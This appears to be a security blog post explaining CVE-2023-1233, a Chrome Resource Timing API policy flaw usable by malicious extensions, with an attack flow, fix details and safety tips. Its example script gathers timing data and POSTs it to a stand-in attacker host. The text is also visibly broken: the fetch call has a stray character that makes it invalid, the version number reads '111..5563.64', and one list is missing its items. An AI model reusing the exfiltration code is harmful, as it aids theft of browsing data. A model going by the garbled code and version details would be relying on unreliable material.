CVE-2023-1233 - Inside the Resource Timing Policy Flaw in Google Chrome and How Malicious Extensions Could Exploit It

Google Chrome, one of the world’s most popular browsers, continually faces scrutiny from security researchers due to its massive user base and web API complexity. In early 2023, security experts discovered a subtle but intriguing vulnerability: CVE-2023-1233. This bug didn't break the doors wide open for attackers, but it did leave a small window by which malicious Chrome extensions could potentially grab sensitive information through the Resource Timing API. In this post, we’ll break down the flaw, show you how it might be exploited, and link to more technical details for those who want to go even deeper.

Understanding the Bug

CVE-2023-1233 is all about "insufficient policy enforcement" in Chrome’s Resource Timing API. But what does this mean, in simple terms?

Chrome offers the Resource Timing API so web developers can measure how long their resources (images, scripts, etc.) take to load. To protect sensitive data, browsers are supposed to apply certain privacy policies—making sure websites (or extensions) can’t spy on resources or timing details from another origin unless they’re supposed to.

In this case, prior to Chrome 111..5563.64, Chrome didn't enforce those restrictions strictly enough when it came to Chrome extensions. In other words, if a user installed a malicious Chrome extension, it could potentially access more timing information about browser resources than was safe.

Severity: Low—but still notable for privacy risk.

How Attackers Might Abuse the Bug

While CVE-2023-1233 isn’t something that’ll be exploited by casual browsers or remote attackers right away, it does give a harmful Chrome extension the power to spy on things it shouldn’t.

The Attack Flow

- Step 1: An attacker creates a malicious Chrome extension and convinces a user to install it (usually via phishing, shady ads, or social engineering).
- Step 2: The extension uses the Resource Timing API to gather information about pages the user visits, possibly leaking details about:

Potentially even which internal APIs or endpoints are being hit

- Step 3: This data can be sent back to the attacker, possibly revealing sensitive browsing details or fingerprinting the user.

Example Code: How a Malicious Extension Could Leak Data

Here's a simplified JavaScript example that could be embedded in a Chrome extension's background script or content script. This would let an attacker collect performance data from your browsing session:

// background.js or content.js in the malicious extension

// Get all resource timing info
const timings = performance.getEntriesByType("resource");

// Filter out same-origin resources (attempt to get more than allowed)
const sensitiveData = timings.filter(entry => {
  // Here, check for cross-origin endpoints or interesting URLs
  return entry.name.includes("api") || entry.name.includes("private");
});

// Send the data to attacker's server
fetch('https://attacker.example.com/steal';, {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ data: sensitiveData })
});

In older (unpatched) Chrome versions, this might leak more information than browsers are supposed to allow extensions to capture from web pages.

What Was the Fix?

Chromium developers patched the flaw by tightening the enforcement around which resources extensions can see with the Resource Timing API. If an extension is running in the context of a website, it can no longer see information the website itself isn’t permitted to access.

This change came in version 111..5563.64. If you have a newer Chrome, you’re protected.

How to Stay Safe

- Update Chrome: Always let Chrome auto-update. This patch was released in March 2023 (release notes).
- Review Extensions: Only install extensions from trusted publishers. Check reviews and permissions before installing.

Technical References

- Chromium Issue Tracker: CVE-2023-1233 _(sometimes requires log-in)_
- Chrome Release Notes, March 2023
- Resource Timing in MDN Docs
- NIST NVD Description

Conclusion

CVE-2023-1233 didn’t shake the Chrome universe, but it’s a good reminder that even "low" severity bugs can create serious risk when combined with crafty social engineering or malicious extensions. Stay patched, install extensions carefully, and you’ll stay ahead of attackers!


If you want more deep dives into Chrome security, bookmark this post or follow major security lists like Full Disclosure and Chromium’s security page. Stay safe!

Timeline

Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/10/2023 20:24:00 UTC